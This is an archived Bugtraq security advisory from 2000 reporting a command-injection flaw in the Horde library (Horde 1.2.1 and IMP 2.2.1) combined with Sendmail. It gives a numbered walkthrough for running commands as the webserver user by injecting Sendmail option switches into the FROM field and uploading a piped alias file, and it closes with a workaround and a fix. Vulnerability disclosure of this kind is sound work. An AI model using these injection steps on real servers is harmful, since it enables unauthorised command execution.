Home page logo

bugtraq logo Bugtraq mailing list archives

Horde library Bug part 2
From: "Steube, Jens" <Jens.Steube () COC-AG DE>
Date: Mon, 18 Sep 2000 18:56:14 +0200

Hash: SHA1

* Horde Library $from Bug part 2 + How to exploit with IMP and Sendmail *

Description:    The Fix of the first detected problem with the $from
                variable in the horde library was just escaping shellchars
                which avoids directly executing commands.

                It is still possible to exploit the parsed $from line and
                execute commands under the uid and gid of the webserver.

Tested on:      Debian 2.2 (potato)
                others not tested yet.

Release Date:   15/09/2000

Autors:         Found, exploited and documentated by Jens "atomi" Steube.
                Fixed by Christian "thepoet" Winter.

Version:        Horde v1.2.1
                IMP v2.2.1

The Exploit:    e.g: Horde and IMP, as MTA we use Sendmail (v8.11.0)

        0.      The job is to send a mail to a address
                which is defined in an aliasfile which is manually
                added to Sendmail. This alias pipes to a command.

        1.      Logon to IMP and open a compose window.
        2.      Locally open a texteditor and write a line in mta-aliasfile
                format. after that, save it locally.

        line e.g:
        evil () localhost: "|/usr/X11R6/bin/xterm -display"

                (or any other command to be executed on the webserver)

        3.      Upload the local stored file as an attachment.
        4.      Open the html source-code of the compose-window
                and search for '/tmp'.
        5.      You will find the local stored filename and
                path of the attachment on the webserver.
                Copy it to the Clipboard.

                mind: that filename looks like /tmp/php??????.att

        6.      Just close the compose window!
        7.      Open a new compose window.
        8.      As your FROM-line insert:

        line e.g: (including all quotetypes)
        <"x () x -O QueueDirectory=/tmp -O AliasFile=(insert Clipboard) -Fx">

        9.      As your TO-line insert the useralias, which you have
                defined in the uploaded attachement.

                e.g: evil () localhost

        10.     Leave all other fields blank and send the mail.
        11.     Exploited.

Other MTAs:     Above exploit works out with Sendmail in most
                configurations, but other MTAs could also be exploited
                the same way.

                Notice that just disabling of the AliasFile flag is not
                enough to prevent attacking this bug because most MTAs
                also provide other commandswitches to include external

Workaround:     The "$from" var has to be checked for "-" chars following
                the space character. Passing those chars unfiltered will
                nearly always lead to exploitable bugs or errors.
                As neither a mail address nor a name with a leading minus
                sign does make sense, here is a small patch that converts
                every minus at the beginning of a word into an underscore:


Fix:            Best solution would be generally not to pass vars to
                popen(), but rather opening the pipe to Sendmail by calling
                popen("$default->path_to_Sendmail -t)
                and putting all available information into the mail header.
                This requires some extra checking and converting, but
                secures the system a lot.

Feedback:       Please send suggestions, updates, and comments to

                mailto: security () coc-ag net

Disclaimer:     The information within this document may change without
                notice. Use of this information constitutes acceptance
                for use in an AS IS condition. There are NO warranties
                with regard to this information. In no event shall the
                author be liable for any consequences whatsoever arising
                out of or in connection with the use or spread of this
                information. Any use of this information lays within the
                user's responsibility.

References:     Both projects (Horde and IMP) of the horde group can be
                found at http://horde.org
                Despite those few bugs, these people there have really
                done a great job on free software.

Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]